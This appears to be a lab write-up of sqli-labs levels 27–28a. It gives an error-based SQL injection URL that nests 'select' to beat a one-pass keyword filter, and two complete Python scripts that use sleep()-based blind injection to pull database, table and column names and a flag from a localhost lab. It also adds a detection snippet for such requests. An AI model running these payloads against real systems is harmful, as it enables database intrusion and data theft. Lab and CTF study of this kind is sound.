Preface:
This post covers sqli-labs less27, less27a, less28 and less28a. The series is updated continuously; the earlier levels are in my previous posts. If anything here is wrong, corrections from fellow researchers are welcome.
Main text:
less27:
This level filters out union and select, but the workaround is simple: the same double-writing used earlier to get past the or filter works here, except that this level needs three nested selects (a plain double-write is still completely filtered out; I have not read the source, so I am not sure exactly why). Error-based injection is used here. Since the database name can be read without using select, I go straight to the step of querying the table names, see the screenshot:
The table names are dumped successfully; here is the payload:
http://localhost/sqli-labs-master/Less-27/?id=1'||extractvalue(1,concat('~',(seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))))||1='1
The point being tested is the select part. It is worth noting that this level does not filter or; the remaining steps are the same as in the earlier levels and are not repeated here.
less27a:
This level differs little from less26a: there is likewise no error output, it just filters select in addition to what 26a filters. Here is the script:
import requests
import datetime

url = 'http://localhost/sqli-labs-master/Less-27a/?id=1"'

def get_dbname():
    db_name = ''
    for i in range(1, 11):  # substr() positions are 1-based
        for k in range(32, 127):
            # %%26%%26 becomes %26%26 after % formatting, i.e. a URL-encoded && (spaces are filtered)
            payload = '%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261="1' % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:  # sleep(2) fired, so this character matched
                db_name += chr(k)
                break
    print("数据库名为->" + db_name)

get_dbname()

def get_table():
    tables_name = ''
    for i in range(1, 41):
        for k in range(32, 127):
            # select is nested inside itself so that one removal pass still leaves a select
            payload = '%%26%%26if(ascii(substr((seselselectectlect(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),%d,1))=%d,sleep(2),1)%%26%%261="1' % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                tables_name += chr(k)
                break
    print("所有表名为->" + tables_name)

get_table()

def get_columns():
    columns_name = ''
    for i in range(1, 11):
        for k in range(32, 127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(group_concat(column_name))from(information_schema.columns)where(table_name="flag")),%d,1))=%d,sleep(2),1)%%26%%261="1' % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                columns_name += chr(k)
                break
    print("所有字段名为->" + columns_name)

get_columns()

def get_flag():
    flag = ''
    for i in range(1, 41):
        for k in range(32, 127):
            payload = '%%26%%26if(ascii(substr((selselselectectect(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261="1' % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                flag += chr(k)
                break
    print("flag为->" + flag)

get_flag()
Screenshot of the result:
Since the difference is small, I will not go through it in detail again.
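The lesson of less27 and less27a above is that a blacklist which removes each keyword once is passed by nesting the keyword inside itself, and that the blind extraction depends on sleep() delays. As an added example, not code from this post or from sqli-labs, the following Python shows why the one-pass filter fails and how a defender would flag such requests in access logs: it mirrors a lab-style single removal pass, strips to a fixed point instead, and classifies constructed request lines shaped like this page's URLs (the sample lines and the indicator names are my own).

```python
import re
from urllib.parse import unquote

# Constructed request lines shaped like this lab's URLs (sample input, not captured traffic).
SAMPLE_REQUESTS = [
    "/Less-27/?id=1'||extractvalue(1,concat('~',(seselselectectlect(group_concat(table_name))"
    "from(information_schema.tables)where(table_schema='security'))))||1='1",
    '/Less-27a/?id=1"%26%26if(ascii(substr(database(),1,1))=115,sleep(2),1)%26%261="1',
    "/Less-28/?id=1",
    "/Less-28/?id=1&name=selection",  # benign value that merely contains a keyword
]

KEYWORDS = ("union", "select")
KEYWORD_RE = re.compile("|".join(KEYWORDS), re.IGNORECASE)
TIME_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
ERROR_RE = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)

def lab_style_filter(s: str) -> str:
    """Single-pass blacklist in the spirit of these levels: each keyword is removed once."""
    for kw in KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s

def strip_to_fixed_point(s: str) -> str:
    """Repeat the filter until nothing changes; a nested keyword cannot survive this."""
    prev = None
    while prev != s:
        prev, s = s, lab_style_filter(s)
    return s

def classify(request_line: str) -> set:
    """Return the set of injection indicators found in one request line."""
    decoded = unquote(request_line)  # %26 -> &, %27 -> ', as the server sees it
    found = set()
    # A keyword still present after ONE removal pass means it was written nested:
    # a benign 'selection' becomes 'ion' and is not flagged.
    if KEYWORD_RE.search(lab_style_filter(decoded)):
        found.add("keyword survives single-pass filter")
    if TIME_RE.search(decoded):
        found.add("time-based function")
    if ERROR_RE.search(decoded):
        found.add("error-based xml function")
    return found

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line[:40], "->", sorted(classify(line)))
```

Stripping to a fixed point is only a detection aid; the actual fix for these levels is a parameterized query rather than a keyword blacklist.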
less28:
Straight to less28. I did not read other writeups and just did it myself; I do not know why less28 is even simpler than less27a: less27a uses double quotes while less28 uses single quotes, and it does not even filter select (other researchers' blogs say the backend only filters union and select when the two are used together), so it can be run with the same kind of script as before:
import requests
import datetime

url = "http://localhost/sqli-labs-master/Less-28/?id=1'"

def get_dbname():
    db_name = ''
    for i in range(1, 11):  # substr() positions are 1-based
        for k in range(32, 127):
            # %%26%%26 becomes %26%26 after % formatting, i.e. a URL-encoded && (spaces are filtered)
            payload = "%%26%%26if(ascii(substr(database(),%d,1))=%d,sleep(2),1)%%26%%261='1" % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:  # sleep(2) fired, so this character matched
                db_name += chr(k)
                break
    print("数据库名为->" + db_name)

get_dbname()

def get_tables():
    tables_name = ''
    for i in range(1, 41):
        for k in range(32, 127):
            payload = "%%26%%26if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),%d,1))=%d,sleep(2),1)%%26%%261='1" % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                tables_name += chr(k)
                break
    print("所有表名为->" + tables_name)

get_tables()

def get_columns():
    columns_name = ''
    for i in range(1, 11):
        for k in range(32, 127):
            payload = "%%26%%26if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))=%d,sleep(2),1)%%26%%261='1" % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                columns_name += chr(k)
                break
    print("所有的字段名为->" + columns_name)

get_columns()

def get_flag():
    flag = ''
    for i in range(1, 41):
        for k in range(32, 127):
            payload = "%%26%%26if(ascii(substr((select(flag)from(flag)),%d,1))=%d,sleep(2),1)%%26%%261='1" % (i, k)
            time1 = datetime.datetime.now()
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            difference = (time2 - time1).seconds
            if difference > 1:
                flag += chr(k)
                break
    print("flag为->" + flag)

get_flag()
less28a:
This level again uses boolean/time-based blind injection. Testing shows the script is exactly the same as for less26a; see the less26a post for details.
Done, thanks for your support!